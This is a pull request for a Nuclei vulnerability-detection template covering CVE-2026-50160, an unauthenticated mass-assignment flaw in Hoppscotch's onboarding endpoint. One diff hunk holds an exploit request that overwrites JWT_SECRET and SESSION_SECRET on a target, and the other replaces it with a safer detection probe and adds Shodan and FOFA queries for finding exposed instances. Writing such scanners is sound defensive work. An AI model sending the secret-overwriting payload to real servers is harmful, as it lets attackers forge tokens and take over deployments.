### PR TITLE
Add CVE-2026-50160 template

### DIFF
--- a/http/cves/2026/CVE-2026-50160.yaml
+++ b/http/cves/2026/CVE-2026-50160.yaml
@@ -1,39 +1,64 @@
-id: cve-2026-50160-hoppscotch-onboarding-mass-assignment
+id: CVE-2026-50160
 
 info:
-  name: Hoppscotch Unauthenticated Onboarding JWT Secret Mass Assignment (CVE-2026-50160)
+  name: Hoppscotch <= 2026.4.1 - Mass Assignment JWT_SECRET Overwrite
   author: str4k3r
   severity: critical
-  description: >
-    Hoppscotch self-hosted deployments before 2026.5.0 expose the fresh-install
-    onboarding configuration endpoint without authentication. The vulnerable
-    backend accepts undeclared configuration keys, allowing JWT_SECRET and
-    SESSION_SECRET to be overwritten before onboarding is complete. The fixed
-    release rejects those extra properties with a validation error.
+  description: |
+    Hoppscotch self-hosted backend <= 2026.4.1 contains a broken authentication caused by mass assignment via unauthenticated POST /v1/onboarding/config endpoint, letting unauthenticated attackers overwrite JWT_SECRET to forge tokens and fully compromise the server, exploit requires attacker to access fresh instance before onboarding completes or when no users exist.
+  impact: |
+    Unauthenticated attackers can forge JWT tokens and fully compromise the server, including administrator access.
+  remediation: |
+    Update to version 2026.5.0 or later.
   reference:
     - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
     - https://nvd.nist.gov/vuln/detail/CVE-2026-50160
+    - https://github.com/hoppscotch/hoppscotch/pull/6171
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10.0
     cve-id: CVE-2026-50160
     cwe-id: CWE-915
   metadata:
-    max-request: 1
     verified: true
-  tags: cve,cve2026,hoppscotch,mass-assignment,auth-bypass,unauth
+    max-request: 2
+    vendor: hoppscotch
+    product: hoppscotch
+    shodan-query: http.title:"Hoppscotch"
+    fofa-query: title="Hoppscotch"
+  tags: cve,cve2026,hoppscotch,mass-assignment,jwt
+
+flow: http(1) && http(2)
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/v1/onboarding/config"
-    headers:
-      Content-Type: application/json
-    body: '{"VITE_ALLOWED_AUTH_PROVIDERS":"EMAIL","MAILER_SMTP_ENABLE":"true","MAILER_SMTP_URL":"smtp://marker.invalid:25","MAILER_ADDRESS_FROM":"marker@example.invalid","JWT_SECRET":"CVE50160_MARKER_JWT","SESSION_SECRET":"CVE50160_MARKER_SESSION"}'
-    matchers-condition: and
+  - raw:
+      - |
+        GET /v1/onboarding/status HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+
     matchers:
-      - type: status
-        status:
-          - 201
-      - type: word
-        part: body
-        words:
-          - '"token"'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "canReRunOnboarding")'
+          - 'contains(body, "\"onboardingCompleted\":false") || contains(body, "\"canReRunOnboarding\":true")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /v1/onboarding/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: application/json
+
+        {"CVE_2026_50160_DETECT":"true"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 400'
+          - 'contains(body, "VITE_ALLOWED_AUTH_PROVIDERS")'
+          - '!contains(body, "should not exist")'
+        condition: and

--- a/http/cves/2026/CVE-2026-50160.yaml
+++ b/http/cves/2026/CVE-2026-50160.yaml
@@ -1,0 +1,39 @@
+id: cve-2026-50160-hoppscotch-onboarding-mass-assignment
+
+info:
+  name: Hoppscotch Unauthenticated Onboarding JWT Secret Mass Assignment (CVE-2026-50160)
+  author: str4k3r
+  severity: critical
+  description: >
+    Hoppscotch self-hosted deployments before 2026.5.0 expose the fresh-install
+    onboarding configuration endpoint without authentication. The vulnerable
+    backend accepts undeclared configuration keys, allowing JWT_SECRET and
+    SESSION_SECRET to be overwritten before onboarding is complete. The fixed
+    release rejects those extra properties with a validation error.
+  reference:
+    - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-50160
+  classification:
+    cve-id: CVE-2026-50160
+    cwe-id: CWE-915
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,hoppscotch,mass-assignment,auth-bypass,unauth
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/v1/onboarding/config"
+    headers:
+      Content-Type: application/json
+    body: '{"VITE_ALLOWED_AUTH_PROVIDERS":"EMAIL","MAILER_SMTP_ENABLE":"true","MAILER_SMTP_URL":"smtp://marker.invalid:25","MAILER_ADDRESS_FROM":"marker@example.invalid","JWT_SECRET":"CVE50160_MARKER_JWT","SESSION_SECRET":"CVE50160_MARKER_SESSION"}'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 201
+      - type: word
+        part: body
+        words:
+          - '"token"'


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-50160** as an ecosystem contribution.
The template follows the repository format and references the public advisory.